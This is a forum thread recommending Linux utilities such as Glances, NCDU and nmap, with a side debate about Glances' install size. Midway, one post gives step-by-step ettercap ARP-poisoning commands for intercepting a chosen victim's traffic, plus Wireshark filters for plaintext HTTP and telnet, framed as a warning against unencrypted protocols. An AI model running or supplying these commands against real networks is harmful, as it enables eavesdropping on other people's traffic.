ML
    • Recent
    • Categories
    • Tags
    • Popular
    • Users
    • Groups
    • Register
    • Login

    Handy Linux Utilities

    IT Discussion
    7
    18
    1.3k
    Loading More Posts
    • Oldest to Newest
    • Newest to Oldest
    • Most Votes
    Reply
    • Reply as topic
    Log in to reply
    This topic has been deleted. Only users with topic management privileges can see it.
    • travisdh1T
      travisdh1 @marcinozga
      last edited by

      @marcinozga said in Handy Linux Utilities:

      @stuartjordan said in Handy Linux Utilities:

      Glances: A nice resource usage utility:

      I have a mixed feelings about this one. It's really useful but it's rather bloated, close to 100MB with all dependencies. Docker images are even worse, developer was hesitant with Alpine based images.

      The Docker images being silly large is understandable to me, it's just another lazy container packager.

      What I want to know is how you get Glances and dependencies up to 100MB? The rpm file in the Fedora 24 repository is only around 1 MB.

      M 1 Reply Last reply Reply Quote 1
      • M
        marcinozga @travisdh1
        last edited by marcinozga

        @travisdh1
        glances.PNG

        On Ubuntu 20.10

        1 Reply Last reply Reply Quote 0
        • M
          marcinozga
          last edited by

          glances1.PNG

          Ubuntu 21.04

          travisdh1T 1 Reply Last reply Reply Quote 0
          • travisdh1T
            travisdh1 @marcinozga
            last edited by

            @marcinozga said in Handy Linux Utilities:

            glances1.PNG

            Ubuntu 21.04

            I guess I never install just Glances alone, and I for sure never use Ubuntu when I have a choice in the matter.

            1 1 Reply Last reply Reply Quote 0
            • M
              marcinozga
              last edited by

              docker.PNG

              Docker image, extracted. That's huge for alpine based.

              1 Reply Last reply Reply Quote 0
              • CloudKnightC
                CloudKnight @marcinozga
                last edited by

                @marcinozga said in Handy Linux Utilities:

                @stuartjordan said in Handy Linux Utilities:

                I'll start With a couple and will add more

                NCDU: A utility to track down where high file usage is being used:

                I love it and use all the time.

                Glances: A nice resource usage utility:

                I have a mixed feelings about this one. It's really useful but it's rather bloated, close to 100MB with all dependencies. Docker images are even worse, developer was hesitant with Alpine based images.

                NMAP: Network scan/Security scan with Vulnerability scripts:

                Classic. No comments needed.

                Terminator (gnome) - A different terminal that you can split into multiple terminals:

                I've never used it, I don't have any Linux desktops to try it. Killer name though.

                Some servers I use Htop but I do like Glances though, I use it on my home machine for example.

                1 Reply Last reply Reply Quote 1
                • 1
                  1337 @travisdh1
                  last edited by 1337

                  @travisdh1 said in Handy Linux Utilities:

                  @marcinozga said in Handy Linux Utilities:

                  glances1.PNG

                  Ubuntu 21.04

                  I guess I never install just Glances alone, and I for sure never use Ubuntu when I have a choice in the matter.

                  I'm not a Glances users but looking at it it uses python and psUtils so it's a pretty complicated way of monitoring system resources. So it has more dependencies. Not your typical C unix utility, so to speak.

                  But you might be able to keep it contained by not installing all recommended packages. Just add the --no-install-recommends options.

                  If there is some package among the recommended ones that you need, you can just install it yourself.

                  travisdh1T 1 Reply Last reply Reply Quote 0
                  • travisdh1T
                    travisdh1 @1337
                    last edited by

                    @pete-s said in Handy Linux Utilities:

                    @travisdh1 said in Handy Linux Utilities:

                    @marcinozga said in Handy Linux Utilities:

                    glances1.PNG

                    Ubuntu 21.04

                    I guess I never install just Glances alone, and I for sure never use Ubuntu when I have a choice in the matter.

                    I'm not a Glances users but looking at it it uses python and psUtils so it's a pretty complicated way of monitoring system resources. So it has more dependencies. Not your typical C unix utility, so to speak.

                    But you might be able to keep it contained by not installing all recommended packages. Just add the --no-install-recommends options.

                    If there is some package among the recommended ones that you need, you can just install it yourself.

                    Yep, Glances is not the normal very small and efficient program. It's the best thing I've found for giving a good idea of overall system performance without having to switch between multiple different programs to look at everything tho.

                    1 1 Reply Last reply Reply Quote 1
                    • 1
                      1337 @travisdh1
                      last edited by

                      @travisdh1 said in Handy Linux Utilities:

                      @pete-s said in Handy Linux Utilities:

                      @travisdh1 said in Handy Linux Utilities:

                      @marcinozga said in Handy Linux Utilities:

                      glances1.PNG

                      Ubuntu 21.04

                      I guess I never install just Glances alone, and I for sure never use Ubuntu when I have a choice in the matter.

                      I'm not a Glances users but looking at it it uses python and psUtils so it's a pretty complicated way of monitoring system resources. So it has more dependencies. Not your typical C unix utility, so to speak.

                      But you might be able to keep it contained by not installing all recommended packages. Just add the --no-install-recommends options.

                      If there is some package among the recommended ones that you need, you can just install it yourself.

                      Yep, Glances is not the normal very small and efficient program. It's the best thing I've found for giving a good idea of overall system performance without having to switch between multiple different programs to look at everything tho.

                      Makes sense. I usually monitor performance outside of the OS - if it's a VM and it usually is.

                      1 Reply Last reply Reply Quote 1
                      • CloudKnightC
                        CloudKnight
                        last edited by

                        Why we must warn people not to use non encrypted traffic:
                        Do Not Use Telnet,Ftp or standard http

                        Here we will do an arp poison man in the middle attack to see another devices traffic on the same network. when we just had hubs this was easier now we have switches we have to use this method:

                        1. apt install wireshark (Graphical)
                        2. apt install nmap
                        3. apt install etttercap-text-only (there is a graphical version, this is cli only)
                        4. sudo nmap -sn 192.168.1.0/24
                        5. descover hosts IP and mac addresses / pick a host.
                        6. sudo ettercap -T(txt only) -S(no ssl) -i(interface) wlan0 -M(man in the middle attack) arp:remote /192.168.1.1(router)// //192.168.1.8//(person to attack)
                        7. sudo wireshark then apply filter ip.addr = 192.168.1.8
                        8. obviously cannot see inside encrypted ssl traffic.
                        9. but we can see plain text packets by applying filter ip.addr == 192.168.1.8 && http
                        10. save in wireshark as pcap file
                        11. visit website a-packets.com - generates a report for free.
                        12. to see telnet as it's clear text use filter = wireshark filter ip.addr = = 192.168.1.8 && telnet
                        pmonchoP dafyreD 2 Replies Last reply Reply Quote 0
                        • pmonchoP
                          pmoncho @CloudKnight
                          last edited by

                          @stuartjordan said in Handy Linux Utilities:

                          Why we must warn people not to use non encrypted traffic:
                          Do Not Use Telnet,Ftp or standard http

                          Here we will do an arp poison man in the middle attack to see another devices traffic on the same network. when we just had hubs this was easier now we have switches we have to use this method:

                          1. sudo ettercap -T(txt only) -S(no ssl) -i(interface) wlan0 -M(man in the middle attack) arp:remote /192.168.1.1(router)// //192.168.1.8//(person to attack)

                          In this example, ettercap has the ability to see packets (the conversation) on a switched network between two different end points?

                          CloudKnightC 1 Reply Last reply Reply Quote 0
                          • CloudKnightC
                            CloudKnight @pmoncho
                            last edited by

                            @pmoncho yes while the man in the middle still passes the packets through to the router and back to the client. If they are using a basic hub (layer 1) rather then a switch don't need to do this at all. just fire up wireshark as hubs don't use mac addresses.

                            1 1 Reply Last reply Reply Quote 1
                            • 1
                              1337 @CloudKnight
                              last edited by 1337

                              @stuartjordan said in Handy Linux Utilities:

                              @pmoncho yes while the man in the middle still passes the packets through to the router and back to the client. If they are using a basic hub (layer 1) rather then a switch don't need to do this at all. just fire up wireshark as hubs don't use mac addresses.

                              Haven't seen a hub in decades. But setting up a mirror port on a switch will work exactly the same.

                              Also you only need wireshark for the analysis of the dumped traffic. tcpdump is the utility for capturing the traffic.

                              CloudKnightC 1 Reply Last reply Reply Quote 0
                              • CloudKnightC
                                CloudKnight @1337
                                last edited by CloudKnight

                                @pete-s You can setup a mirror port if you have admin access to the switch. which hopefully isn't left with the default login settings.

                                1 Reply Last reply Reply Quote 3
                                • dafyreD
                                  dafyre @CloudKnight
                                  last edited by

                                  @stuartjordan said in Handy Linux Utilities:

                                  Why we must warn people not to use non encrypted traffic:
                                  Do Not Use Telnet,Ftp or standard http

                                  Here we will do an arp poison man in the middle attack to see another devices traffic on the same network. when we just had hubs this was easier now we have switches we have to use this method:

                                  1. apt install wireshark (Graphical)
                                  2. apt install nmap
                                  3. apt install etttercap-text-only (there is a graphical version, this is cli only)
                                  4. sudo nmap -sn 192.168.1.0/24
                                  5. descover hosts IP and mac addresses / pick a host.
                                  6. sudo ettercap -T(txt only) -S(no ssl) -i(interface) wlan0 -M(man in the middle attack) arp:remote /192.168.1.1(router)// //192.168.1.8//(person to attack)
                                  7. sudo wireshark then apply filter ip.addr = 192.168.1.8
                                  8. obviously cannot see inside encrypted ssl traffic.
                                  9. but we can see plain text packets by applying filter ip.addr == 192.168.1.8 && http
                                  10. save in wireshark as pcap file
                                  11. visit website a-packets.com - generates a report for free.
                                  12. to see telnet as it's clear text use filter = wireshark filter ip.addr = = 192.168.1.8 && telnet

                                  I had a student do this to the student network at my last job. Everybody would complain about slow network in one building but by the time I could go check it, it was fine again. I figured out what he was doing and some switches have stuff built in to combat this (you just have to turn it on).

                                  1 Reply Last reply Reply Quote 1
                                  • 1 / 1
                                  • First post
                                    Last post